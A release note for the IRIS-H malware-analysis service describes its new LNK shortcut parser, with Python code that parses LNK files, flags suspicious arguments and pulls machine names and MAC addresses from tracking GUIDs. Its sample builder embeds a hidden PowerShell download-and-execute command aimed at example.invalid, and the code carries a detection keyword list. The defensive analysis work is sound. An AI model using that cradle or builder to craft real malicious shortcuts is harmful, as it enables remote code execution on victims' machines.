Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI
Short Description: A Shell Link (.LNK) file format parser has been added to the API component. Cosmetic changes to the UI align the new data view with the existing report format.
Outstanding Tasks: Implement support for missing Extra Data Blocks
Detailed Summary
A new binary data parser has been added to the IRIS-H service. It handles processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through the Submission page and can also detect them automatically when they are embedded in submitted documents. In either case, the report page displays the extracted binary data enriched with human-readable descriptions. The enrichment process references the official Microsoft specification for the [MS-SHLLINK] Shell Link Binary File Format.
The parser fully supports the following LNK file structures:
- ShellLinkHeader
- LinkTargetIDList
- LinkInfo
- StringData
The ExtraData structure is partially supported at this time. Only the following Data Blocks are processed:
- EnvironmentVariableDataBlock
- KnownFolderDataBlock
- SpecialFolderDataBlock
- TrackerDataBlock
- PropertyStoreDataBlock
Once all binary data has been extracted, it is subjected to a rule-based evaluation that concludes whether the submitted or embedded LNK file can be harmful. IRIS-H will also attempt to reconstruct the command line the link would launch, including its arguments if any. Below is an example of rule-based evaluation results.
Figure: LNK file rule-based evaluation results
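To make the structures above concrete, here is an added example (not IRIS-H code, and not the service's actual rule set) of how a parser walks the fixed 76-byte ShellLinkHeader, skips LinkTargetIDList and LinkInfo by their declared sizes, reads the StringData fields, rebuilds the command line and applies a few illustrative rules. The flag values, CLSID and ShowCommand constants are taken from [MS-SHLLINK]; the interpreter list, argument markers and the sample LNK bytes (including the target path, arguments and URL) are assumptions constructed for this example.

```python
import struct
from datetime import datetime, timedelta, timezone

# LinkFlags bits ([MS-SHLLINK] 2.1.1) that this example needs.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# ShowCommand values the spec defines; any other value must be treated as SW_SHOWNORMAL.
SHOW_COMMAND = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk (little-endian) form.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# StringData fields in the order they appear when their LinkFlags bit is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
# Hypothetical rule inputs: interpreters whose arguments decide what really runs.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
ARG_MARKERS = ("-enc", "-w hidden", "-windowstyle hidden", "http", "iex",
               "downloadstring", "frombase64string")

def filetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_lnk(data):
    """Parse ShellLinkHeader and StringData; LinkTargetIDList and LinkInfo are skipped by size."""
    (size, clsid, flags, attrs, ctime, atime, wtime, fsize, icon, show, hotkey) = \
        struct.unpack_from("<I16sIIQQQIiIH", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size                  # IDListSize does not count itself
    if flags & HAS_LINK_INFO:
        (info_size,) = struct.unpack_from("<I", data, pos)
        pos += info_size                        # LinkInfoSize counts itself
    strings = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return {"flags": flags, "file_attributes": attrs, "file_size": fsize,
            "creation_time": filetime(ctime), "access_time": filetime(atime),
            "write_time": filetime(wtime), "icon_index": icon, "hotkey": hotkey,
            "show_command": SHOW_COMMAND.get(show, "SW_SHOWNORMAL"),
            "strings": strings, "extra_data_offset": pos}

def reconstruct_command_line(lnk):
    """Target plus arguments, the way the shell would launch it (relative path used as target here)."""
    s = lnk["strings"]
    target = s.get("relative_path", "")
    return f"{target} {s['arguments']}".strip() if s.get("arguments") else target

def evaluate(lnk):
    """Illustrative rules: interpreter target, hidden window, download/encoding markers, long arguments."""
    s = lnk["strings"]
    target_name = s.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = s.get("arguments", "").lower()
    findings = []
    if target_name in SCRIPT_HOSTS:
        findings.append(f"target {target_name} is a script/command interpreter")
    if lnk["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("ShowCommand SW_SHOWMINNOACTIVE keeps the target window hidden")
    hits = [m for m in ARG_MARKERS if m in args]
    if hits:
        findings.append("arguments contain " + ", ".join(hits))
    if len(args) > 200:
        findings.append("unusually long argument string")
    return {"command_line": reconstruct_command_line(lnk),
            "suspicious": bool(findings), "findings": findings}

# Constructed sample input; the target, arguments and URL are made up for this example.
SAMPLE_TARGET = "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_ARGS = "-w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""
SAMPLE_WORKDIR = "C:\\Users\\Public"

def build_sample_lnk(target=SAMPLE_TARGET, args=SAMPLE_ARGS, workdir=SAMPLE_WORKDIR, show=7):
    """Build a minimal LNK: header, an IDList holding only its TerminalID, no LinkInfo, Unicode StringData."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    ft = 132_000_000_000_000_000   # constructed FILETIME (April 2019)
    header = struct.pack("<I16sIIQQQIiIH", 0x4C, LNK_CLSID, flags, 0x20,
                         ft, ft, ft, 0, 0, show, 0) + bytes(10)   # 10 reserved bytes
    idlist = struct.pack("<H", 2) + bytes(2)   # IDListSize=2 covers just the TerminalID
    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + idlist + string_data(target) + string_data(workdir) + string_data(args)

if __name__ == "__main__":
    lnk = parse_lnk(build_sample_lnk())
    print(lnk["show_command"], lnk["write_time"].date())
    print(evaluate(lnk))
```

A real LinkInfo carries LocalBasePath and CommonPathSuffix, which give a better target than the relative path; the parser above deliberately skips it to stay focused on the header and StringData. Note that CountCharacters is a character count, so the byte length doubles when IsUnicode is set.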
A few new sections have been added to the "Informational Findings" panel. They display information about the LNK file target: file path, working directory, relative path, command-line arguments, and so on. One section in particular, "Link Target Tracking", contains the evaluation results of the data stored in the following fields of the TrackerDataBlock:
- Droid Volume Identifier
- Droid File Identifier
- Birth Droid Volume Identifier
- Birth Droid File Identifier
Figure: LNK file Informational Findings example
The "Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, the TrackerDataBlock holds the NetBIOS name of the machine on which the Link Target was created and, inside the file identifier GUID, the MAC address of that machine's network adapter. See below for an example.
Figure: Data derived from TrackerDataBlock
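The "Link Target Tracking" fields and the TrackerDataBlock described above are the same 96 bytes seen from two angles, so one added example covers both. This is example code written for this page, not IRIS-H's parser: it walks the ExtraData section, validates a TrackerDataBlock against the layout in [MS-SHLLINK] 2.5.10, and decodes each DROID GUID. The MAC address and timestamp come from the RFC 4122 version-1 UUID layout (node field and 60-bit time since 1582-10-15), which is why they are only present when the GUID's version is 1. The "moved since birth" inference and the sample block (machine name, GUIDs, MAC) are assumptions constructed for this example.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

TRACKER_SIGNATURE = 0xA0000003   # BlockSignature of TrackerDataBlock ([MS-SHLLINK] 2.5.10)
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)   # version-1 UUID time base

def iter_extra_data_blocks(extra):
    """Walk ExtraData, yielding (BlockSignature, raw block). A BlockSize < 4 is the TerminalBlock."""
    pos = 0
    while pos + 4 <= len(extra):
        (size,) = struct.unpack_from("<I", extra, pos)
        # Stop at the terminal block, at a block too short for a signature, or on a truncated file.
        if size < 8 or pos + size > len(extra):
            break
        (sig,) = struct.unpack_from("<I", extra, pos + 4)
        yield sig, extra[pos:pos + size]
        pos += size

def describe_droid(guid_bytes):
    """Decode one DROID GUID; version-1 GUIDs embed a 100 ns timestamp and the generating NIC's MAC."""
    u = uuid.UUID(bytes_le=guid_bytes)       # GUIDs are stored little-endian on disk
    info = {"guid": str(u), "version": u.version}
    if u.version == 1:
        node = u.node.to_bytes(6, "big")
        info["mac"] = ":".join(f"{b:02x}" for b in node)
        # Multicast bit set means the node was randomly generated, not a hardware address.
        info["mac_is_random"] = bool(node[0] & 0x01)
        info["timestamp"] = UUID_EPOCH + timedelta(microseconds=u.time // 10)
    return info

def parse_tracker_block(block):
    """Split a TrackerDataBlock into MachineID and the four DROID GUIDs."""
    size, sig, length, version = struct.unpack_from("<IIII", block, 0)
    if sig != TRACKER_SIGNATURE or size != 0x60 or length != 0x58 or version != 0:
        raise ValueError("not a well-formed TrackerDataBlock")
    return {
        "machine_id": block[16:32].split(b"\0", 1)[0].decode("ascii", "replace"),  # NUL-padded NetBIOS name
        "droid_volume": describe_droid(block[32:48]),
        "droid_file": describe_droid(block[48:64]),
        "birth_droid_volume": describe_droid(block[64:80]),
        "birth_droid_file": describe_droid(block[80:96]),
    }

def link_target_tracking(t):
    """Illustrative evaluation: which machine created the target, when, and whether it has moved volumes."""
    birth = t["birth_droid_file"]
    return {"originator": t["machine_id"],
            "mac": birth.get("mac"),
            "created": birth.get("timestamp"),
            "moved_since_birth": t["droid_volume"]["guid"] != t["birth_droid_volume"]["guid"]}

def build_sample_extra_data():
    """Constructed sample ExtraData: one TrackerDataBlock followed by the TerminalBlock."""
    machine = b"win10-lab".ljust(16, b"\0")
    vol = uuid.UUID("8d2c3b1a-77f4-4a0e-9c21-3d5e6f7a8b9c").bytes_le   # version 4: no MAC inside
    fil = uuid.UUID("c9d2e4a6-1c58-11ea-9d2c-0050569c1a2b").bytes_le   # version 1: MAC + timestamp
    block = struct.pack("<IIII", 0x60, TRACKER_SIGNATURE, 0x58, 0) + machine + vol + fil + vol + fil
    return block + struct.pack("<I", 0)   # TerminalBlock

if __name__ == "__main__":
    for sig, raw in iter_extra_data_blocks(build_sample_extra_data()):
        if sig == TRACKER_SIGNATURE:
            tracker = parse_tracker_block(raw)
            print(tracker["droid_file"])
            print(link_target_tracking(tracker))
```

When the current and birth identifiers differ, the target has been copied or moved since the link was created, which is worth surfacing next to the originator's machine name. Treat the MAC as an attribution hint, not proof: a multicast node or a non-version-1 GUID carries no hardware address.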
The ShellLinkHeader section contains the timestamps associated with the Link Target (creation, access and write), its file attributes, and the window state (ShowCommand) the target is launched with. Shown alongside them are the type of media the target resides on (hard disk, USB, network, etc.) and the media serial number, which the parser takes from the VolumeID structure inside LinkInfo. See below for an example.
Figure: Data derived from ShellLinkHeader
In addition, IRIS-H will attempt to resolve the "Known Folder" GUID and the "Special Folder" ID and display their corresponding descriptions. See the example below.
Figure: Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock
Examples of full reports can be found at the links below:
https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771 - submitted LNK file.
https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506 - embedded LNK file found in a Microsoft Office document.